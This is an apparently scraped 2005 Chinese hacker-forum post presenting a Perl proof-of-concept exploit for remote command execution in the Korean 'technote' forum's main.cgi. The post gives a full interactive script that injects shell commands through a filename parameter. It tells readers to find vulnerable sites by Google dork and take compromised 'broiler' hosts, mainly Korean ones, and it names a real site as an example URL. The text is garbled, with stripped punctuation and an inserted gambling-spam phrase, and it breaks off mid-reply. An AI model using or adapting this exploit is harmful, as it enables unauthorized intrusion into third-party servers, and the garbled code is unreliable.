不可小看technotemain.cgi远程执行命令漏洞.docVIP

不可小看的technotemain.cgi远程执行命令漏洞 [原创]不可小看的technotemain.cgi远程执行命令漏洞 文章标题:[原创]不可小看的technotemain.cgi远程执行命令漏洞顶部 无敌最寂寞 发布于:2005-02-0213:16 [楼主][原创]不可小看的technotemain.cgi远程执行命令漏洞 文章作者：无敌最寂寞[E.S.T] 信息来源：邪恶八进制PRC（www.EvilO） technote是韩国某公司出品的一个论坛程序，在韩国的使用率挺高。。可惜它却有个”小小” 的漏洞，允许我们远程以web权限执行任意命令。。。HOHO，具体漏洞描述可以去查找。。。我就不多说了。。。 程序源代码如下，用perl写的。。。懒得用c写。。有兴趣的朋友可以给改改。。。呵呵，用c里wininet的函数来处理也是非常容易的。。。 不要小看这个漏洞，去google有哪些信誉好的足球投注网站如下关键字： /technote/main.cgi 你会找到很多肉鸡。。。。嘎嘎。。。 Copycode #!usr/bin/perl useLWP::UserAgent; my$suburl=#39;shop.pdf?down_num=5466654board=rebarz99command=down_loadfilename=rb9.txt||#39;; my$ua=newLWP::UserAgent; print*x70,\n; print\t\t,technotemain.cgiremoteexecutionexploitPOC,\n; print\t\t, writtenby无敌最寂寞[E.S.T],\n; print*x70,\n\n; printNOTICE:pressCTRL+Ctoterminatethisprogram!\n\n; printpleaseEnterthetargetURL:; my$url=STDIN; chomp($url); my$r=$url; printpleaseEntermain.cgipath(defaultistechnote/main.cgi/):; my$cgi=STDIN; if($cgine\n) { chomp($cgi); } else {$cgi=#39;technote/main.cgi/#39;;} $url.=$cgi.$suburl; while(1) { print\nPleaseEnteryourcommand:; my$command=STDIN; chomp($command); my$temp=#39;|#39;.$command.#39;|#39;; $url=~s/\|(.*)\|/$temp/; printtheurltosubmitis$url\n; my$request=newHTTP::Request(#39;GET#39;=$url); $request-header(#39;Referer#39;=$r); my$res=$ua-request($request); if($res-is_success){ print+x60,\n; print$res-content; print+x60,\n; } else{ print(Error:.$res-status_line.\n); } } 有点乱，没办法，我是一边看漏洞一边写的程序。。写完了。。也就没再改。。。懂perl的朋友给提高提高吧。。。呵呵 程序利用过程如下图： =800)window.open(30/tools/technote.GIF);onload=if(this.width800)this.width=800;if(this.height800)this.height=800; 需要说明的是：在URL那部分你必须输入类似： http://www.sarm.co.kr/ 后面要有一个“/，别给漏了。。。因为我没费那劲去处理那些没有“/的url。。 另外在输入main.cgi的路径的时候也要注意。输入类似下面的： technote/main.cgi/ 不要有前导/而且后面也要跟个“/，如果是默认路径（即technote/main.cgi/）可以直接回车，不必输入。。。 程序只是一个proofofconcept，需要添加其它功能的朋友可以随意修改代码。。但请保留原始出处信息。。。谢谢。。。。 放开了去找韩国肉鸡吧。。。（当然其它国也有。。。哈哈） 下面是代码下载： 附件：technote.rar(1K)下载次数:103顶部 菜白大 发布于:2005-02-0221:07 [1楼] 找了一个win平台的,结